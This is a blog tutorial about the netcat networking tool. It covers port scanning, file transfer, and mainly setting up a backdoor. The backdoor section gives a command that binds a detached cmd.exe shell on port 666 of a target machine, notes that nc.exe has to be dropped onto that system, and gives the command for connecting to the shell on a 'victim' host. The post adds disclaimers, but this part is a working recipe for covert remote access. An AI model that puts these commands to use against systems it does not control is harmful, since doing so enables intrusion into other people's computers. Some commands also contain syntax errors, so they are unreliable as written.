Skip to content

Netcat and How to Harness it’s Power

The Basics

Netcat is an invaluable tool to many Networking Researchers and for any power-user or hacker it’s a great tool to have. Netcat is for lack of a better term a “Networking Swiss Army Knife” it allows for basic and in depth modification of TCP/UDP packets. It would be hard to sum up all of Netcats uses in 1 post but here are a few of it’s uses.

  • Port Scanner
  • Backdoor
  • FTP Server/Client
  • HTTP Server/Client
  • Networked Hard Drive Backups
  • Chat Client/Server

I’m just going to touch briefly on many of these uses, but I’ll go more in depth into some of the more security related uses such as backdooring and port scanning.

The not-Basics

WARNING: SHARKS AND OTHER NASTY’S AHEAD IF YOU’RE NOT EXPERIENCED NETWORKING PROFESSIONAL, YOU MAY BE EATEN ALIVE!

Port Scanning with Netcat

As any networking security professional worth his weight in salt knows, Port Scanning is a technique that is widespread, well known, and dangerous given the right tools and circumstances. Port Scanning is essentially you going through a neigborhood and knocking on peoples doors until somebody responds, only they don’t see you standing in front of there door but you saw them. Port Scanning can tell a criminal or administrator a lot about a network and the computers on it, such as

  1. What services are running
  2. What services the computers on the network utilize
  3. If there is an active IDS or Firewall in place
  4. If there is adequate security and protection on a networking
  5. and much, much more

Do not attempt to port scan any networks that you do not personally run or operate and know the laws of your local area before attempting any public Port Scanning adventures.

How to use Netcat as a Port Scanner

nc -v -w 1 http://www.example.com -z 1-1000

Not to complex of a command now lets break it down to see how you can use this as a more valuable tool,

“nc” – issues the command to initiate netcat
“-v” – makes the output more verbose aka. more information
“-w 1” – allows you to specify a time-out, in this case the time-out is 1
“www.example.com” – is either the address or IP of your victim
“-z 1-1000” – tells Netcat which ports to scan you can specify whole blocks or individual ports

Together all of these arguments make this command versatile and great for many simple port scanning situations.

Using Netcat as a Backdoor

Backdoors are the most basic forms of RAT’s or Remote Access Tools, installing a Backdoor will give you access to someones system from a remote location whenever you want they are invaluable to Black-hat Hackers and even some System Administrators. Depending on the scope of Backdoor that you use you will have the ability to control,monitor,modify, and destroy a targets computer system. Backdooring someones system is not an offense to be taken lightly and you should never Backdoor a system that is not your own.

How to use Netcat as a Backdoor Server

nc -L -d -p 666 -e cmd.exe

Not to complex of a command now lets break it down to see how you can use this as a more valuable tool,

“nc” – issues the command to initiate Netcat

“-L” – tells Netcat to listen even on disconnect!

“-d” – tells Netcat to detach from the shell becoming it’s own process in the background

“-p 666” – specifies the port number that the server is running on in this case 666

“-e cmd.exe” – tells Netcat to execute a CMD prompt whenever someone connects

You must execute this command on the client’s system and as you guess you have to also either drop or install nc.exe somewhere on the clients system, I will leave that subject for another guide/website to cover.

How to use Netcat as a Backdoor Client

nc -vv http://www.victim.com 666

Not to complex of a command now lets break it down to see how you can use this as a more valuable tool,

“nc” – issues the command to initiate Netcat

“-vv” – tells Netcat to be really, really verbose

“www.victim.com” – the host that ran the initial command

“666” – the port number the initial hosts server is running on

Once you connect you should be given a shell to do whatever you want with on the clients systems. Some people include VNC servers with there RATS or tools like WGET to download files, it’s all about personal preference or finesse.

Using Netcat as a FTP Server/Client

Using Netcat as a FTP or File Transfer Protocol client is pretty simple. One computer hosts the file and the other one receives it. I will go over the commands very briefly.

How to use Netcat as a FTP Client

nc -l -p 1234 > TESTDOC.doc

Not to complex of a command now lets break it down to see how you can use this as a more valuable tool,

“nc” – issues the command to initiate Netcat

“-l” – tells Netcat to listen

“-p 1234” – specifies the port and gives the number in this case 1234

“>” – tells net cat that it is receiving the file

“TESTDOC.doc” – the name of the file Netcat is receiving.

How to use Netcat as a FTP Server

nc – w 1 http://www.example.com 1234 < TESTDOC.doc

Not to complex of a command now lets break it down to see how you can use this as a more valuable tool,

“nc” – issues the command to initiate Netcat

“-w 1” – tells net cat to wait 1 second to timeout

“www.example.com 1234” – the host address of the client and the port number

“< TESTDOC.doc” – the file to transfer to the client


Conclusion

The scope of what Netcat can be used for really varies on the user and new people find new uses all the time. If you are interested in any more facets of using Netcat feel free to contact me or visit Netcats man pages.

Advertisements
One Comment Post a comment
  1. Hey Ian, Just wanted to say nice job on this article/guide. In depth yet still understandable by those just starting out. I look forward to reading more.

    August 30, 2011

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: